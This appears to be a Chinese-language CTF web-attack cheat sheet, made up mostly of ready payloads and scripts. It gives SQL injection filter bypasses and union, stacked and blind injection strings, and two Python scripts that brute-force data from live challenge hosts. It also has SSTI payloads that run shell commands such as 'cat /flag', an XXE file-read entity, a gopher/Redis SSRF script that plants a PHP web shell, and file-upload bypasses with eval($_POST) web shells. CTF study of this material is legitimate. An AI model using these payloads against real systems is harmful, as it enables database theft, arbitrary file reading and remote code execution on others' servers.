常见的几个HTTP IP头

x-forwarded-for
x-remote-IP
x-originating-IP
x-remote-ip
x-remote-addr
x-client-ip
x-client-IP
Client-ip
X-Real-ip

SQL Injection

FUZZ测试字典

and
aNd
or
oR
oorr
select
sElect
union
unIon
union select
union/**/select
/**/

 '
 "
 \
 information_schema
 ^
 &&
 uniOn/**/select

关键词替代

空格被过滤

/**/
/*1*/

若某关键词被过滤，双写在内部

如union --> uniunionon
  select  --> seleselectct
  from   -->  frfromom

union被过滤

利用  /*!union*/  可以绕过对union的过滤

or被过滤

使用
||
替代

联合注入

判断查询几个字段
'or 1=2 union select 1,2,3,4 #
爆表名得fl4g
'or 1=2 union select group_concat(table_name),2,3,4 from information_schema.columns where table_schema=database()#
爆列名得skctf_flag
'or 1=2 union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema=database()#
查询表fl4g获得flag
'or 1=2 union select skctf_flag,2,3,4 from fl4g#

子查询

-1'/**/union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

堆叠注入

用分号结束一个语句来实现执行任意的sql语句
1';show databases;#
1';show tables;#

查看表结构

0';desc 表名;#

盲注

异或型

ORD() #转ASCII
异或'^'是一种数学运算，1^1=0 0^0=0 1^0=0，可以用来进行sql注入，当两条件相同时（同真同假）结果为假，当两条件不同时（一真一假）结果为真。

import re
import requests
import string

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn/search.php"
flag = ''

def payload(i, j):
    # 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1"%(i,j)
    # 列名
    #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())),%d,1))>%d)^1"%(i,j)
    # 查询flag
    #sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res

def exp():
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)

exp()

数字型

import re
import requests
import string

url = "http://1fb17384-cfbb-49c8-8c5f-c32784aa812b.node3.buuoj.cn/image.php?id=\\0&path=or "
flag = ''

def payload(i, j):
    # 数据库名字
    sql = "id = if(ascii(substr(database(),%d,1))>%d,1,-1)%%23"%(i,j)
    # 表名
    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,1,-1)%%23"%(i,j)
    # 列名
    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,1,-1)%%23"%(i,j)
    # 查询flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,1,-1)%%23"%(i,j)

    r = requests.get(url + sql)
    # print (r.url)
    if "JFIF" in r.text:
        res = 1
    else:
        res = 0
    return res

def exp():
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)

exp()

SSTI模板注入：

一篇文章带你理解漏洞之 SSTI 漏洞

smarty利用

• smarty中的{if}标签中可以执行php语句，得flag：{if readfile('/flag')}{/if}
• smarty中还有{literal}、{php}(smarty 2可用)
• {literal}可以让块中间的内容忽略Smarty的解析，paylaod: {literal}alert('xss');{/literal}可以产生xss

绕过

• 过滤单引号，用双引号来绕过
• 过滤点 . ，用[]来绕过
• 过滤下划线_，用\x5f来绕过
• 过滤class,base,subclasses这些，用+进行字符串的拼接来绕过。

python

可利用的模板

(58, <class 'warnings.WarningMessage'>, '__builtins__')
(58, <class 'warnings.WarningMessage'>, 'linechache')
(59, <class 'warnings.catch_warnings'>, '__builtins__')
(59, <class 'warnings.catch_warnings'>, 'linechache')
(60, <class '_weakrefset._IterationGuard'>, '__builtins__')
(61, <class '_weakrefset.WeakSet'>, '__builtins__')
(71, <class 'site._Printer'>, '__builtins__')
(71, <class 'site._Printer'>, 'os')
(76, <class 'site.Quitter'>, '__builtins__')
(76, <class 'site.Quitter'>, 'os')
(77, <class 'codecs.IncrementalEncoder'>, '__builtins__')
(78, <class 'codecs.IncrementalDecoder'>, '__builtins__')

构造payload

{{().__class__.__bases__[0].__subclasses__()}}
---查看所有可用模块

{{().__class__.base__.__subclasses__().index(warnings.catch_warnings)}}
查看利用模板的位置，不一定生效

{{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
发现可以执行，构造payload
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__import__']('os').listdir('/')}}{% endif %}{% endfor %}
查看根目录

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}
读取源码

查看根目录
__import__(\"os\").popen(\"ls\").read()
读取文件
__import__(\"os\").popen(\"cat flag.txt\").read()

{{()["__class__"]["__bases__"][0]["__subclasses__"]()[80]["load_module"]("os")["system"]("ls")}}
//用<class '_frozen_importlib.BuiltinImporter'>这个去执行命令
{{()["__class__"]["__bases__"][0]["__subclasses__"]()[91]["get_data"](0, "app.py")}}
//用<class '_frozen_importlib_external.FileLoader'>这个去读取文件

flag写进config，config被过滤，通过url_for进行绕过

{{url_for.__globals__}}  #得到所有模块
{{url_for.__globals__['current_app'].config}} #通过current_app读取config

Twig模板注入

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};

php

伪协议

传输协议

?text=data://text/plain,I have a dream

读取文件

?file=php://filter/read=convert.base64-encode/resource=index.php

XXE漏洞

读取任意文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY file SYSTEM "file:///flag" >
]>
<root>
<name>&file;</name>
</root>

SSRF漏洞

import urllib
protocol="gopher://"
ip="10.66.150.11"
port="6379"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload

文件上传

修改后缀

常用后缀有php3、php4、phtml、pht、phpt、php5、php6

文件攻击

上传.htaccess文件

SetHandler application/x-httpd-php

头部绕过

gif(GIF89a):47 49 46 38 39 61
GIF87a

MIME检测绕过

image/gif
image/png
image/jpeg
image/svg+xml

00截断

%00截断：在get请求最后加一个%00
00截断(post)：通过二进制修改在最后改错00

js绕过

<script language="php">eval($_POST['laotun']);</script>

短标签绕过

<?=@eval($_POST['laotun']);?>